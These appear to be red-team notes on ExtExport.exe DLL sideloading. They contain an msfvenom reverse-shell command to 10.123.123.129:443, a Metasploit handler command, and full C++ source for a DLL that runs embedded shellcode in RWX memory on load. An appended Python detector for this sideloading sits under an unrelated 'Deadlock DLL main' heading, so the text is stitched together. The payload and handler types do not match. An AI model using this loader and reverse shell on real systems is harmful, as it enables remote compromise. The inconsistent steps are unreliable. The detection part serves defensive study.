https://kienmanowar.wordpress.com/2019/02/21/reversing-with-ida-from-scratch-p1/#more-3437

---

## Applications

- https://www.dji.com/global/downloads/softwares/assistant-dji-2
- https://edu.casio.com/softwarelicense/index.php#col2

---

## ExtExport.exe

- Overview: an Internet Explorer executable located at *C:\Program Files\Internet Explorer\Extexport.exe*.
- Idea: ExtExport.exe will load and execute a DLL only if that DLL is named mozcrt19.dll, mozsqlite3.dll or sqlite.dll.
- Steps:

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.123.123.129 LPORT=443 -f raw -o shellcode
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_http; set LHOST 10.123.123.129; set LPORT 443; exploit"
```

```
#include "pch.h"
#include <windows.h>
#include "resource.h"

// Reads the raw shellcode embedded as an RCDATA resource of this DLL,
// copies it into an RWX allocation and jumps to it.
DWORD WINAPI RunShellCode(LPVOID lpParam)
{
    HMODULE hModule = (HMODULE)lpParam;

    HRSRC hRes = FindResource(hModule, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
    if (!hRes) return 1;
    HGLOBAL hGlobal = LoadResource(hModule, hRes);
    if (!hGlobal) return 1;
    LPVOID pShellCode = LockResource(hGlobal);
    DWORD dwSize = SizeofResource(hModule, hRes);
    if (!pShellCode || dwSize == 0) return 1;

    // RWX memory: a common hunting indicator (VirtualAlloc with PAGE_EXECUTE_READWRITE).
    LPVOID exec = VirtualAlloc(NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!exec) return 1;
    memcpy(exec, pShellCode, dwSize);
    ((void(*)())exec)();
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        // Runs synchronously inside DllMain, i.e. while the loader lock is held
        // (see the "Deadlock DLL main" note below).
        RunShellCode(hModule);
        break;
    }
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

- References:
  + Extexport: https://app.tidalcyber.com/software/2e6f1aed-a983-44fb-aed1-b4a3d9cb9488
  + ExtExport – yet another LOLBin: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/

### Deadlock DLL main
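As an added detection-side example for the ExtExport.exe section above (not code from the original notes): a small checker over image-load records that flags ExtExport.exe loading any of the three DLL names the note lists. The `k=v|k=v` record layout, field names and sample lines are constructed for this example and stand in for a Sysmon Event ID 7 (Image Loaded) feed.

```python
from dataclasses import dataclass
from typing import Dict, Iterable, List

# DLL names the note above says ExtExport.exe will load and execute.
SIDELOAD_NAMES = {"mozcrt19.dll", "mozsqlite3.dll", "sqlite.dll"}

# Constructed image-load records (Sysmon Event ID 7 style, heavily trimmed).
SAMPLE_EVENTS = [
    "EventID=7|Image=C:\\Program Files\\Internet Explorer\\extexport.exe"
    "|ImageLoaded=C:\\Windows\\System32\\kernel32.dll|Signed=true",
    "EventID=7|Image=C:\\Program Files\\Internet Explorer\\ExtExport.exe"
    "|ImageLoaded=C:\\Users\\Public\\mozcrt19.dll|Signed=false",
    "EventID=7|Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe"
    "|ImageLoaded=C:\\Program Files\\Mozilla Firefox\\mozsqlite3.dll|Signed=true",
]


@dataclass
class Alert:
    process: str
    dll: str
    reason: str


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'k=v|k=v' record (constructed format) into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_extexport_sideload(lines: Iterable[str]) -> List[Alert]:
    """Flag image loads where extexport.exe pulls in a sideload-candidate DLL."""
    alerts: List[Alert] = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "7":
            continue  # only image-load events matter here
        proc, dll = ev.get("Image", ""), ev.get("ImageLoaded", "")
        # The Firefox line is ignored: the DLL name alone is not the signal,
        # the loading process must be extexport.exe.
        if basename(proc) != "extexport.exe" or basename(dll) not in SIDELOAD_NAMES:
            continue
        reason = "extexport.exe loaded sideload-candidate DLL " + basename(dll)
        if ev.get("Signed", "").lower() == "false":
            reason += " (unsigned)"
        alerts.append(Alert(proc, dll, reason))
    return alerts
```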